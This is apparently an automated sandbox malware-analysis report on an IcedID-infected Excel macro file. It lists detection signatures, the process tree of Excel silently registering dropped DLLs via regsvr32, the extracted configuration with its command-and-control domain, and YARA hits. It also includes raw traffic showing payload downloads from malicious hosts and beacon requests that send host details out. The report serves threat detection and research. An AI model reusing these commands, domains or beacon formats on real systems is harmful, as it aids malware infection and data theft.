Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Purchaseconfirmation-137606.xlsm

Overview

General Information

Sample Name:Purchaseconfirmation-137606.xlsm
Analysis ID:444685
MD5:732851906622ca3c151360bdfda8b3f2
SHA1:8a365e71a0fc1f1ae38faef239ab085001b5f83f
SHA256:89aabd4ab6b696b3e9f74a04f27c4bc12f90b3a30855a403767ed525baec1736
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapater information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2492 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2708 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 3048 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2176 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_IcedID_1Yara detected IcedIDJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
      00000003.00000002.2099597118.0000000000110000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
      • 0x27c6:$internal_name: loader_dll_64.dll
      • 0x30b4:$string0: _gat=
      • 0x3114:$string1: _ga=
      • 0x30ec:$string2: _gid=
      • 0x30cc:$string3: _u=
      • 0x3026:$string4: _io=
      • 0x30d8:$string5: GetAdaptersInfo
      • 0x2b16:$string6: WINHTTP.dll
      • 0x27ea:$string7: DllRegisterServer
      • 0x27fc:$string8: PluginInit
      • 0x3080:$string9: POST
      • 0x3140:$string10: aws.amazon.com
      00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
        00000006.00000002.2114378210.0000000000120000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com
        00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.regsvr32.exe.110000.0.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x27c6:$internal_name: loader_dll_64.dll
          • 0x30b4:$string0: _gat=
          • 0x3114:$string1: _ga=
          • 0x30ec:$string2: _gid=
          • 0x30cc:$string3: _u=
          • 0x3026:$string4: _io=
          • 0x30d8:$string5: GetAdaptersInfo
          • 0x2b16:$string6: WINHTTP.dll
          • 0x27ea:$string7: DllRegisterServer
          • 0x27fc:$string8: PluginInit
          • 0x3080:$string9: POST
          • 0x3140:$string10: aws.amazon.com
          4.2.regsvr32.exe.110000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x1bc6:$internal_name: loader_dll_64.dll
          • 0x1f16:$string6: WINHTTP.dll
          • 0x1bea:$string7: DllRegisterServer
          • 0x1bfc:$string8: PluginInit
          6.2.regsvr32.exe.120000.0.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x27c6:$internal_name: loader_dll_64.dll
          • 0x30b4:$string0: _gat=
          • 0x3114:$string1: _ga=
          • 0x30ec:$string2: _gid=
          • 0x30cc:$string3: _u=
          • 0x3026:$string4: _io=
          • 0x30d8:$string5: GetAdaptersInfo
          • 0x2b16:$string6: WINHTTP.dll
          • 0x27ea:$string7: DllRegisterServer
          • 0x27fc:$string8: PluginInit
          • 0x3080:$string9: POST
          • 0x3140:$string10: aws.amazon.com
          6.2.regsvr32.exe.200000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x27c6:$internal_name: loader_dll_64.dll
          • 0x30bc:$string0: _gat=
          • 0x311c:$string1: _ga=
          • 0x30f4:$string2: _gid=
          • 0x30d4:$string3: _u=
          • 0x302e:$string4: _io=
          • 0x30e0:$string5: GetAdaptersInfo
          • 0x2b16:$string6: WINHTTP.dll
          • 0x27ea:$string7: DllRegisterServer
          • 0x27fc:$string8: PluginInit
          • 0x3088:$string9: POST
          • 0x3148:$string10: aws.amazon.com
          3.2.regsvr32.exe.460000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x27c6:$internal_name: loader_dll_64.dll
          • 0x30bc:$string0: _gat=
          • 0x311c:$string1: _ga=
          • 0x30f4:$string2: _gid=
          • 0x30d4:$string3: _u=
          • 0x302e:$string4: _io=
          • 0x30e0:$string5: GetAdaptersInfo
          • 0x2b16:$string6: WINHTTP.dll
          • 0x27ea:$string7: DllRegisterServer
          • 0x27fc:$string8: PluginInit
          • 0x3088:$string9: POST
          • 0x3148:$string10: aws.amazon.com
          Click to see the 4 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2492, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 2708

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 6.2.regsvr32.exe.120000.0.raw.unpackMalware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2176, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2708, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3048, type: MEMORY
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49168 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49172 version: TLS 1.0
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

          Software Vulnerabilities:

          barindex
          Document exploit detected (creates forbidden files)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to behavior
          Document exploit detected (drops PE files)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: lsdfik[1].fml.0.drJump to dropped file
          Document exploit detected (UrlDownloadToFile)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
          Document exploit detected (process start blacklist hit)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
          Source: global trafficDNS query: name: thousandsyears.download
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.224.92.73:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.198.51:80

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: astrocycle.download
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:12:20 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 4570Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=O0dc7lvLICauGXDuIZ%2BlUJ0czK0%2FHrzDaLd78hxuxDslW%2FEG7dUbO8GtBLbuhCTL9p3xRamKpR049uJzRM%2F%2BPaEAQMK2guwOR06G7FUf9ZRr7bwsf%2FtO4ngVq0uKYPxd5lcxgN4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a91587ef2a4a9e-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:12:20 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 4569Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=d%2BaXch2L3fd900zKjzyYSRfC9hQVPWG3n4OZYVEj39RvIOnQ1%2Fa8iGrhk9uRSqSlCiC1SigaLdQfqr0oQ0gBrEPc4nhFAbBdmpUQpqqW7Ea51Pqhc0o5X6y1jw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a915898a8f4e2b-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 13:12:20 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 4568Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TcxOBI3LE7hks3UaLOzUCmei%2B3AhO5N50KzVCQZzFU1dHMyrurpRjRiizcjGmU0Vvk2hCVFbxSnz%2FlI9j7iM2llIWQNg49350wtmQZK7MwLZo2PMqLP68%2BaJ5mQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9158b08f1177a-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:4650:50; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:31383635374239393136433034454441; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:4654:50; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:39463738354244374233363041433337; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:4657:51; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:31383342324439354536373742443933; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49168 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49172 version: TLS 1.0
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B690E83.pngJump to behavior
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:4650:50; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:31383635374239393136433034454441; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:4654:50; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:39463738354244374233363041433337; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:4657:51; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:31383342324439354536373742443933; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
          Source: regsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
          Source: regsvr32.exe, 00000003.00000002.2102606658.0000000003280000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: unknownDNS traffic detected: queries for: thousandsyears.download
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 13:12:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=eqVDpeP3%2FQWy91%2BnROpUr1zFbLOABWy3KxvIavdHrlVsvVafuJbIVzkMZyh5BR6WYn0mKLNptc2rXflmcrwvcPIeU1Dl6F5jJb5%2F5TDBK2ouFaIhUMxIOfZz6pAcN8WJTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9159dbd54bef6-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 